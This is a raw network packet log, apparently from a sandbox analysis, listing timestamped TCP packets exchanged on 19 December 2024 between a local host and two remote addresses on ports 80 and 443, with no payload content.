                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.152412891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.152431965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.152458906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.153214931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.153269053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.153321028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.153356075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.153367996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.153399944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.154114962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.154166937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.154230118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.154280901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.159533024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.159568071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.159585953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.159604073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.159606934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.159646988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.159951925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.160007954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.160042048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.160126925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.160839081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.160959005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.192147970 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.245800018 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.301450968 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.301472902 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.317662954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.317702055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.317738056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.317739964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.317764997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.317771912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.317986965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.318023920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.318041086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.318061113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.318063021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.318104029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.318804026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.318856001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319027901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319078922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319129944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319166899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319176912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319214106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319916010 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.319968939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320025921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320063114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320077896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320110083 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320797920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320849895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320915937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.320960999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.321388960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.321438074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.321444035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.321480036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.321491003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.321521997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.322386026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.322421074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.322434902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.322458029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.322462082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.322505951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.323137045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.323185921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.323191881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.323227882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.323239088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.323271036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324069023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324110031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324122906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324157000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324172020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324199915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324917078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324971914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.324975014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325007915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325023890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325048923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325812101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325865030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325866938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325901985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325916052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.325942039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.326668024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.326725960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.326759100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.326793909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.326806068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.326836109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.327603102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.327655077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.327658892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.327696085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.327711105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.327735901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.328458071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.328509092 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.328516006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.328552008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.328563929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.328598022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.329341888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.329391956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.329412937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.329461098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.329464912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.329509974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.330224037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.330276012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.330324888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.330359936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.330374002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.330403090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.331124067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.331173897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.331177950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.331214905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.331222057 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.331255913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332201004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332240105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332254887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332276106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332283020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332315922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332916021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.332969904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333004951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333029032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333056927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333825111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333859921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333878994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333913088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333950043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.333973885 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.334692955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.334745884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.334748030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.334780931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.334784031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.334826946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.335592031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.335681915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.335716963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.335728884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.335767031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.336519957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.336555004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.336589098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.336606979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.337347984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.337398052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.337402105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.337436914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.337451935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.337480068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.338253021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.338306904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.338314056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.338342905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.338356972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.338390112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.339149952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.339207888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.339433908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.339485884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.339521885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.339534044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.339572906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.340308905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.340409040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.340444088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.340461969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.340485096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.341234922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.341269016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.341303110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.341322899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.341350079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.342111111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.342165947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.342171907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.342201948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.342206001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.342240095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343139887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343194962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343194962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343230963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343240023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343275070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343858004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343918085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343944073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.343980074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344002962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344018936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344803095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344856977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344856977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344891071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344902039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.344939947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.345652103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.345695972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.345702887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.345737934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.345741034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.345784903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.348359108 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.351644039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.351680040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.351713896 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.351730108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.351767063 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.352087975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.352140903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.352175951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.352195978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.352217913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.352955103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.353008986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360606909 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360621929 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360646963 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360662937 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360671997 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360691071 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360738993 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360768080 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.360807896 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403070927 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403084040 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403111935 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403120995 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403179884 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403223991 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403259039 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.403449059 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511383057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511518002 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511567116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511620045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511738062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511897087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511948109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.511984110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.512003899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.512048960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.512717962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.512819052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513091087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513127089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513164043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513190985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513197899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513233900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513262987 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513268948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513351917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513376951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513415098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513454914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.513484955 CET4986080192.168.2.431.41.244.11
